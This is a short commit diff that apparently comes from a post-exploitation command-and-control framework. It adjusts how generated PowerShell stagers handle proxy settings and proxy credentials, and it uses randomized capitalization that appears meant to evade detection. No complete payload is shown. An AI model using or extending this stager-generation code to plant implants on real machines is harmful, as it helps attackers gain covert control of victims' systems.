php_fix
xorrior 2018-01-06 16:49:10 -05:00
parent 9a3df6d8c5
commit 66050064fd
2 changed files with 4 additions and 1 deletions

View File

@ -3012,6 +3012,7 @@ class ListenersMenu(SubMenu):
stager.options['Language']['Value'] = language
stager.options['Base64']['Value'] = "True"
stager.options['Proxy']['Value'] = listenerOptions['options']['Proxy']['Value']
stager.options['ProxyCreds']['Value'] = listenerOptions['options']['ProxyCreds']['Value']
if self.mainMenu.obfuscate:
stager.options['Obfuscate']['Value'] = "True"
else:

View File

@ -329,7 +329,9 @@ class Listener:
stager += helpers.randomize_capitalization("$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('"+ proxy.lower() +"');")
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('")
stager += proxy.lower()
stager += helpers.randomize_capitalization("');")
stager += helpers.randomize_capitalization("$wc.Proxy = $proxy;")
if proxyCreds.lower() != 'none':
if proxyCreds.lower() == "default":